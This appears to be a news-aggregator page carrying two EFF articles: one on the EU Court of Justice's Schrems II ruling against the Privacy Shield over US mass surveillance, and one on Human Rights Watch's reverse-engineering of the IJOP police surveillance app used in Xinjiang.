Summary

Total Articles Found: 2

Top sources:

Top Keywords:

Top Authors

Top Articles:

  • EU Court Again Rules That NSA Spying Makes U.S. Companies Inadequate for Privacy
  • Human Rights Watch Reverse-Engineers Mass Surveillance App Used by Police in Xinjiang

EU Court Again Rules That NSA Spying Makes U.S. Companies Inadequate for Privacy

Published: 2020-07-16 22:37:44

Popularity: 2396

Author: Danny O'Brien

Keywords:

  • Commentary
  • Surveillance and Human Rights
  • NSA Spying
  • International
  • EU Policy
  • The European Union’s highest court today made clear—once again—that the US government’s mass surveillance programs are incompatible with the privacy rights of EU citizens. The judgment was made in the latest case involving Austrian privacy advocate and EFF Pioneer Award winner Max Schrems. It invalidated the “Privacy Shield,” the data protection deal that secured the transatlantic data flow, and narrowed the ability of companies to transfer data using individual agreements (Standard Contractual Clauses, or SCCs). Despite the many “we are disappointed” statements by the EU Commission, U.S. government officials, and businesses, it should come as no surprise, since it follows the reasoning the court made in Schrems’ previous case, in 2015. Back then, the EU Court of Justice (CJEU) noted that European citizens had no real recourse in US law if their data was swept up in the U.S. governments’ surveillance schemes. Such a violation of their basic privacy rights meant that U.S. companies could not provide an “adequate level of [data] protection,” as required by EU law and promised by the EU/U.S. “Privacy Safe Harbor” self-regulation regime. Accordingly, the Safe Harbor was deemed inadequate, and data transfers by companies between the EU and the U.S. were forbidden. Since that original decision, multinational companies, the U.S. government, and the European Commission sought to paper over the giant gaps between U.S. spying practices and the EU’s fundamental values. The U.S. government made clear that it did not intend to change its surveillance practices, nor push for legislative fixes in Congress. All parties instead agreed to merely fiddle around the edges of transatlantic data practices, reinventing the previous Safe Harbor agreement, which weakly governed corporate handling of EU citizen’s personal data, under a new name: the EU-U.S. Privacy Shield. EFF, along with the rest of civil society on both sides of the Atlantic, pointed out that this was just shuffling chairs on the Titanic. The Court cited government programs like PRISM and Upstream as its primary reason for ending data flows between Europe and the United States, not the (admittedly woeful) privacy practices of the companies themselves. That meant that it was entirely in the government and U.S. Congress’ hands to decide whether U.S. tech companies are allowed to handle European personal data. The message to the U.S. government is simple: Fix U.S. mass surveillance, or undermine one of the United States’ major industries. Five years after the original iceberg of Schrems 1, Schrems 2 has pushed the Titanic fully beneath the waves. The new judgment explicitly calls out the weaknesses of U.S. law in protecting non-U.S. persons from arbitrary surveillance, highlighting that: Section 702 of the FISA does not indicate any limitations on the power it confers to implement surveillance programmes for the purposes of foreign intelligence or the existence of guarantees for non-US persons potentially targeted by those programmes. and ... neither Section 702 of the FISA, nor E.O. 12333, read in conjunction with PPD‑28, correlates to the minimum safeguards resulting, under EU law, from the principle of proportionality, with the consequence that the surveillance programmes based on those provisions cannot be regarded as limited to what is strictly necessary. The CJEU could not be more blunt in its pronouncements: but it remains unclear how the various actors that could fix this problem will react. Will EU data protection authorities step up their enforcement activities and invalidate SCCs that authorize data flows to the U.S. for failing to protect EU citizens from U.S. mass surveillance programs? And if U.S. corporations cannot confidently rely on either SCCs or the defunct Privacy Shield, will they lobby harder for real U.S. legislative change to protect the privacy rights of Europeans in the U.S.—or just find another temporary stopgap to force yet another CJEU decision? And will the European Commission move from defending the status quo and current corporate practices, to truly acting on behalf of its citizens? Whatever the initial reaction by EU regulators, companies and the Commission, the real solution lies, as it always has, with the United States Congress. Today's decision is yet another significant indicator that the U.S. government's foreign intelligence surveillance practices need a massive overhaul. Congress half-heartedly began the process of improving some parts of FISA earlier this year—a process which now appears to have been abandoned. But this decision shows, yet again, that the U.S. needs much broader, privacy-protective reform, and that Congress’ inaction makes us all less safe, wherever we are.

    ...more

    Human Rights Watch Reverse-Engineers Mass Surveillance App Used by Police in Xinjiang

    Published: 2019-05-08 00:52:16

    Popularity: 1251

    Author: Gennie Gebhart

    Keywords:

  • Technical Analysis
  • International
  • Surveillance and Human Rights
  • For years, Xinjiang has been a testbed for the Chinese government’s novel digital and physical surveillance tactics, as well as human rights abuses. But there is still a lot that the international human rights community doesn’t know, especially when it comes to post-2016 Xinjiang. Last Wednesday, Human Rights Watch released a report detailing the inner workings of a mass surveillance app used by police and other officials. The application is used by offiicals to communicate with the larger Integrated Joint Operations Platform (IJOP), the umbrella system for collecting mass surveillance data in Xinjiang. This report uncovers what a modern surveillance state looks like, and can inform our work to end them. First, the report demonstrates IJOP’s system of pervasive surveillance targets just about anyone who deviates from an algorithmically-determined norm. Second, as a result, IJOP requires a massive amount of manual labor, all focused towards data entry and translating the physical world into digital relationships. We stand by Human Rights Watch in calling for the end to violations of human rights within Xinjiang, and within China. What’s going on in Xinjiang? Xinjiang is the largest province in China, home to the Uighurs and other Turkic minority groups. Since 2016, the Chinese government has cracked down on the region as a part of the ongoing “Strike Hard” campaign. An estimated 1 million individuals have been detained in “political education centers,” and the IJOP’s surveillance system watches the daily lives of Xinjiang residents. While we fight the introduction and integration of facial recognition and street-level surveillance technologies in the U.S., existing research from Human Rights Watch gives us insight on how facial-recognition-enabled cameras already line the streets in front of schools, markets, and homes in Kashgar. WiFi sniffers log the unique addresses of connected devices, and police gather data from phone inspections, regular intrusive home visits, and mandatory security checkpoints. Human Rights Watch obtained a copy of a mobile app police officers and other officials use to log information about individuals, and released its source code. The primary purpose of the IJOP app is for police officers to record and complete “investigative missions,” which require officers to interrogate certain individuals or investigate vehicles and events, and log the interactions into the app. In addition, the application also contains functionality to search for information about an individual, perform facial recognition via Face++, and detect and log information about WiFi networks within range. Who are they targeting? Well, basically everyone. The application focuses on individuals who fit one of 36 suspicious “Person Types.” These categories, and the nature of these “investigative missions,” reveal a great deal about the types of people IJOP is targeting. When conducting an “investigation,” officers are prompted to create an extensive profile of the individual(s) being investigated. Despite the Chinese government’s claim that their surveillance state is necessary for countering “separatism, terrorism, and extremism,” most of these behavioral personas have nothing to do with any of the above: People who travel. This includes individuals who move in or out of their area of residence often, people who have been abroad, or who have simply left Xinjiang province—even if they do it legally. If an individual has been abroad “for too long,” officials are also prompted to physically check the target’s phone. They’re prompted by the app to search for specific foreign messaging apps (including WhatsApp, Viber, and Telegram), “unusual” software that few people use, VPNs, and whether their browser history contains “harmful URLs.” People with “problematic” content and software on their phones. When “suspicious” software (again, including VPNs or foreign messaging apps like WhatsApp or Telegram) is detected, the IJOP system will send a detailed alert to officials about the target and identifying information about the phone, including a unique device identifier and metadata that can be used to track the phone’s general location. This could be tied to the JingWang spyware app many residents are forced to install. Reverse engineering work from Red Team Lab found that JingWang focuses on inspecting the files stored on the device, and transmits a list of filenames and hashes to a server over an insecure HTTP connection. People, phones, or cars that go “off-the-grid.” This could mean an individual has stopped using a smartphone, or lent a car to a friend. An individual’s ID going “off-grid” typically means they have left Xinjiang and are no longer in IJOP’s jurisdiction of dragnet surveillance, generally due to school, moving (legally), or tourism. People who are related to any of the above. Following the disappearance and subsequent reappearance of poet and musician Abdurehim Heyit, the International Uyghur diaspora started an online activism campaign and reported thousands of missing relatives. The strong focus on relatives and familial ties in the IJOP data profiles confirms Chinese surveillance’s focus on suspecting, interrogating, and even detaining individuals just because they are related to someone who has been deemed “suspicious.” ...And people who are not. The application flags all sorts of people. People who consume too much electricity, people subject to a data entry mishap, people who do not socialize with neighbors, people who have too many children...the list goes on and on. Despite grandiose claims, the process is still manual and labor-intensive Any small deviation from what the IJOP system deems “normal behavior” could be enough to trigger an investigation and prompt a series of intrusive visits from a police officer. As a result, the current surveillance system is extremely labor-intensive due to the broad categorizations of “suspicious persons,” and the raw number of officials needed to keep tabs on all of them. Officers, under severe pressure themselves to perform, overwork themselves feeding data to IJOP. According to Human Rights Watch: These officials are under tremendous pressure to carry out the Strike Hard Campaign. Failure to fulfill its requirements can be dangerous, especially for cadres from ethnic minorities, because the Strike Hard Campaign also targets and detains officials thought to be disloyal. The process of logging all this data is all manual; the app itself uses a simple decision tree to decide what bits of information an official should log. According to Human Rights Watch, although the application itself isn’t as sophisticated as the Chinese government has previously touted, it’s still not exactly clear what sort of analyses IJOP may be doing with this massive trove of personal data and behavior. IJOP’s focus on data entry and translating physical relationships into discrete data points reminds us that digitizing our lives is the first step towards creating a surveillance state. Some parts of the application depend on already-catalogued information: the centralized collection of electricity usage, for instance. Others are intended to collect as much possible to be used elsewhere. In Xinjiang, the police know a huge array of invasive information about you, and it is their job to collect more. And as all behavior is pulled into the state’s orbit, ordinary people can become instant suspects, and innocent actions have to be rigorously monitored. Using certain software becomes, if not a crime, then a reason for suspicion. Wandering from algorithmic expectations targets you for further investigation. Invoking the “slippery slope” is a misnomer, because the privacy violations we predict and fear are already here. Groups like Human Rights Watch, including their brave colleagues within Xinjiang, are doing everyone service by exposing what a modern surveillance state looks like.

    ...more

    end